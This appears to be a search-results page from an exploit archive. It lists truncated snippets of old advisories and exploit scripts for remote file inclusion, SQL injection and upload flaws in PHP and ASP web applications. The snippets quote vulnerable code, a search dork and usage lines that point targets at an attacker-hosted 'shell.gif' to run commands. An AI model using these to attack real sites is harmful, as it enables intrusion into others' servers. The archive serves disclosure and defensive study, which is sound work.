1370 matches found
Ad Manager Pro 2.6 - ipath Remote File Inclusion
Ad Manager Pro 2.6 - ipath Remote File Inclusion Ad Manager Pro 2.6 Remote File Include Vulnerability homepage: phpwebscripts.com Affected files: ad.php and common.php Credit: Basti Vulnerable Code: if $ipath include$ipath.'/common.php'; else include'./common.php'; Example:...
foingInclude.txt
Foing managesongs.php Remote File InclusionphpBB Contact : email: [email protected] & msn: [email protected] Risk : High Class : Remote Script : Foing Version : 0.7.0 e previous --------------------------------------------------------------------- Vulnerable code :...
cmpro-1.1.txt
Hi, http://sx02.coresec.de/advisories/149.txt -- cut here -- !/usr/bin/perl Clan Manager Pro CMPRO perl cmpro.pl http://localhost/path/to/cmpro.extern/ http://localhost/cmd.gif cmd cmd shell example: cmd variable: cmd; DORK: inurl:"cmpro.ext" Vulnerable code cmproheader.inc.php...
Mafia Moblog Full Path Disclosure / SQL injection
Produce : Mafia Moblog WebSite :http://mafia.pearlabs.org Version : 6 Full and Prior Discovred By :Moroccan Security Research Team Simo64 IMPACT : Manipulation of data, System access + Full Path Disclosure : The problem is that it is possible to disclose the full path to 'big.php','upgrade.php' b...
Nucleus CMS 3.22 - 'DIR_LIBS' Remote File Inclusion
!/usr/bin/php -q -d shortopentag=on \r\n"; die...
Sugar Suite Open Source <= 4.2 "OptimisticLock!" arbitrary remote inclusion exploit
!/usr/bin/php -q -d shortopentag=on ? echo "Sugar Suite Open Source = 4.2 "OptimisticLock!" arbitrary remote inclusion exploitrn"; echo "by rgod [email protected]"; echo "site: http://retrogod.altervista.orgrnrn"; echo "this is called the "five claws of Sun-tzu"rnrn"; if $argc5 echo "Usage: ph...
Sugar Suite Open Source <= 4.2 (OptimisticLock) Remote Exploit
No description provided by source. !/usr/bin/php -q -d shortopentag=on ? echo "Sugar Suite Open Source = 4.2 "OptimisticLock!" arbitrary remote inclusion exploit\r\n"; echo "by rgod [email protected]\r\n"; echo "site: http://retrogod.altervista.org\r\n\r\n"; echo "this is called the "five claws...
# MHG Security Team --- Gallery Upload Vulnerabilities
Milli-Harekat Advisory www.milli-harekat.org Gallery Upload Vulnerabilities Risk : High Class: Remote Script : Gallery Scripts Credits : Dj ReMix Thanks : Яy Korsan , Liz0zim ,ESOBAR, PoizinBo0x ,TRIP ,ERNE ,CyberWolf... Vulnerable Scripts : DUGallery v1.x Dugallery v2.x DuPortal v2.x DuBanner Al...
Unclassified NewsBoard <= 1.6.1 patch 1 Arbitrary Local Inclusion Exploit
Exploit for unknown platform in category web applications ========================================================================= Unclassified NewsBoard = 1.6.1 patch 1 Arbitrary Local Inclusion Exploit ========================================================================= !/usr/bin/php -q -...
Unclassified NewsBoard <= 1.6.1 patch 1 Arbitrary Local Inclusion Exploit
No description provided by source. !/usr/bin/php -q -d shortopentag=on ? echo "Unclassified NewsBoard = 1.6.1 patch 1 ABBCConfigsmileset arbitrary\r\n"; echo "local inclusion\r\n"; echo "by rgod [email protected]\r\n"; echo "site: http://retrogod.altervista.org\r\n\r\n"; echo "works with...
# MHG Security Team --- OzzyWork Gallery Upload Vulnerabilities
Milli-Harekat Advisory www.milli-harekat.org OzzyWork Gallery Upload Vulnerabilities Risk : High Class: Remote Script : OzzyWork Gallery All Version Credits : Dj ReMix Thanks : y Korsan , ESKOBAR , Poizonb0x , TRIP OzzyWork Gallery pictures upload page : www.victim.com/Ozzywork Path /add.asp...
phpRaid 3.0.b3 - phpBBSMF Remote File Inclusion
phpRaid 3.0.b3 - phpBBSMF Remote File Inclusion Kurdish Security Advisory phpRaid Remote File Include PHPBB/SMF : "Sosyalizim'de .srar insan olmakta .srard.r" Abdullah Ocalan Contact : irc.gigachat.net kurdhack & www.PatrioticHackers.com & [email protected] Script : phpRaid Script Website :...
phpRaid-2.txt
Kurdish Security Advisory phpRaid Remote File Include SMF : "Sosyalizim'de ısrar insan olmakta ısrardır" Abdullah Ocalan Contact : irc.gigachat.net kurdhack & www.PatrioticHackers.com & [email protected] Risk : High Class : Remote Script : phpRaid Script Website : http://www.spiffyjr.com Versio...
phpRaid <= 3.0.b3 (phpBB/SMF) Remote File Inclusion Vulnerabilities
No description provided by source. Kurdish Security Advisory phpRaid Remote File Include PHPBB/SMF : "Sosyalizim'de .srar insan olmakta .srard.r" Abdullah Ocalan Contact : irc.gigachat.net kurdhack & www.PatrioticHackers.com & [email protected] Script : phpRaid Script Website :...
Claroline Open Source e-Learning 1.7.5 Remote File Include
Description Vendor: http://www.claroline.net The file claroline/auth/extauth/drivers/ldap.inc.php uses the variable clarolineRepositorySys in a include function without being declared. There are other files vulnerable in the same folder, this exploit only attacks ldap.inc.php There is other...
Claroline e-Learning 1.75 (ldap.inc.php) Remote File Inclusion Exploit
No description provided by source. !/usr/bin/perl Claroline Open Source e-Learning 1.7.5 Remote File Include Exploit & Advisorie: beford xbefordx gmail com uso: perl own.pl host cmd-shell-url cmd-var perl own.pl http://host.com/claroline/auth/ http://atacante/shell.gif cmd cmd shell example: ?...
Dokeos LMS <= 1.6.4 (authldap.php) Remote File Include Exploit
Exploit for unknown platform in category web applications ============================================================== Dokeos LMS uso: perl own.pl perl own.pl http://host.com/dokeos/ http://atacante/shell.gif cmd cmd shell example: cmd variable: cmd; Description Vendor: http://www.dokeos.com/ T...
fastclicklite113.txt
Fast Click SQL Lite ----------- Fix : Contact the Vendor =========================================================== Aria Security Research Http://www.aria-security.net...
CoolMenus 4.0 - 'index.php' Remote File Inclusion
source: https://www.securityfocus.com/bid/17738/info CoolMenus is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this issue to include an arbitrary remote file containing malicious P...
phpWebSite 0.10.2 - hub_dir Remote Command Execution
phpWebSite 0.10.2 - hubdir Remote Command Execution !/usr/bin/php -q -d shortopentag=on arbitrary local inclusion, works with magicquotesgpc = Off\r\n"; echo "by rgod, mail: [email protected]\r\n"; echo "site: http://retrogod.altervista.org\r\n\r\n"; if $argc 0 include$hubdir . 'conf/config.php'...